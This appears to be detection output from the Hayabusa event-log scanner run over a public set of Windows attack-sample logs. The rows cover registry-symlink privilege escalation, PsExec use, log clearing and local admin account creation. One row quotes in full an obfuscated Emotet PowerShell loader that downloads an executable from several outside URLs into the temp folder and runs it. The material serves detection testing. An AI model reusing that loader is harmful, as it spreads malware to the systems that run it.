747F3D96-E2A0-5F44-0000-0010B5BA1B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:05.776 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TM.blf | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:05.780 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000001.regtrans-ms | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:05.787 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000002.regtrans-ms | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.398 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.401 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man.LOG1 | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.401 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man.LOG2 | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.401 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TM.blf | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.401 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000001.regtrans-ms | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.418 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000002.regtrans-ms | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.594 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1c-9fa5-11ea-ac3f-00155d0a720b}.TxR.blf | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.610 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1c-9fa5-11ea-ac3f-00155d0a720b}.TxR.0.regtrans-ms | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.644 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,contains | CreateKey: HKLM\SOFTWARE\Microsoft\DRM\DEMO2 | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.644 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,contains | SetValue: HKLM\SOFTWARE\Microsoft\DRM\DEMO2\SymbolicLinkValue: \Registry\Machine\System\CurrentControlSet\Services\ABC | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.677 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.678 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\AppData\Local\Microsoft\CLR_v4.0 | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.678 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\AppData\Local\Microsoft\CLR_v4.0\UsageLogs | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.678 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\TransactionLog.exe.log | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:09:27.981 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\pagefile.sys | Process: C:\Windows\System32\smss.exe | PID: 304 | PGUID: 747F3D96-E34B-5F44-0000-00107D2F0000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:09:27.988 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\swapfile.sys | Process: C:\Windows\System32\smss.exe | PID: 304 | PGUID: 747F3D96-E34B-5F44-0000-00107D2F0000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-26 14:09:28.845 +09:00,DESKTOP-RIPCLIP,4104,info,,PwSh Scriptblock Log,"$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::""SecURi`T`ypRO`T`oCOL"" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/').""S`Plit""([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.""d`OWN`load`FIlE""($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_).""le`NgTH"" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/emotet/exec_emotet_ps_4104.evtx 2020-08-26 14:09:28.845 +09:00,DESKTOP-RIPCLIP,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/emotet/exec_emotet_ps_4104.evtx 2020-08-26 14:09:33.504 +09:00,DESKTOP-RIPCLIP,1,info,,Process Created,"Cmd: ""C:\Users\Clippy\AppData\Local\Temp\word\2019\Dyxxur4gx.exe"" | Process: C:\Users\Clippy\AppData\Local\Temp\WOrd\2019\Dyxxur4gx.exe | User: DESKTOP-RIPCLIP\Clippy | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x2b4c2 | PID: 7448 | PGUID: 075C05C2-EE8D-5F45-8401-000000000400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/emotet/exec_emotet_sysmon_1.evtx 2020-08-26 14:09:33.504 +09:00,DESKTOP-RIPCLIP,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/emotet/exec_emotet_sysmon_1.evtx 2020-08-27 20:40:56.397 +09:00,04246w-win10.threebeesco.com,11,info,,File Created,Path: C:\Windows\PSEXESVC.exe | Process: System | PID: 4 | PGUID: B5CF5917-721E-5F46-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx 2020-08-27 20:40:56.397 +09:00,04246w-win10.threebeesco.com,11,low,Exec,PsExec Tool Execution,,../hayabusa-rules/sigma/file_event/file_event_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx 2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,info,,Process Created,Cmd: C:\WINDOWS\PSEXESVC.exe | Process: C:\Windows\PSEXESVC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\WINDOWS\system32\services.exe | LID: 0x3e7 | PID: 4320 | PGUID: B5CF5917-9BC8-5F47-0000-001042AB2001,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx 2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,Exec,PsExec Service Start,,../hayabusa-rules/sigma/process_creation/proc_creation_win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx 2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,Exec,PsExec Tool Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx 2020-09-02 20:47:39.499 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx 2020-09-02 20:47:48.570 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: a-jbrown | Computer: 04246W-WIN10 | IP Addr: 172.16.66.142 | LID: 0x21a8c68,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx 2020-09-02 20:47:48.823 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: a-jbrown | Computer: - | IP Addr: 172.16.66.142 | LID: 0x21a8c80,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx 2020-09-02 20:47:48.842 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: a-jbrown | Computer: - | IP Addr: 172.16.66.142 | LID: 0x21a8c9a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx 2020-09-04 18:28:22.280 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 18:28:22.280 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 18:28:42.976 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | DeleteKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 19:03:04.489 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 19:03:04.489 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 19:33:31.843 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\sqlsvc | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 19:33:31.843 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\sqlsvc\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 19:45:30.650 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Account Added or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 19:45:33.802 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Account Added or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 19:54:20.005 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Account Added or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 19:54:20.005 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | DeleteKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 19:54:22.974 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 19:54:22.974 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 20:00:13.713 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | DeleteKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 20:00:24.602 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 20:00:24.602 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 20:02:16.084 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Account Added or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-05 22:28:40.585 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 3004 -s 632 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog | LID: 0x3e5 | PID: 3424 | PGUID: 747F3D96-9288-5F53-1902-00000000E500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx 2020-09-05 22:33:34.590 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 3668 -s 4420 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog | LID: 0x3e5 | PID: 4688 | PGUID: 747F3D96-93AE-5F53-3602-00000000E500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx 2020-09-05 22:34:11.983 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x4 /state0:0xa3cea855 /state1:0x41c64e6d | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 6556 | PGUID: 747F3D96-93D3-5F53-3802-00000000E500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx 2020-09-05 22:37:07.245 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x2 /state0:0xa3bd2855 /state1:0x41c64e6d | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 1008 | PGUID: 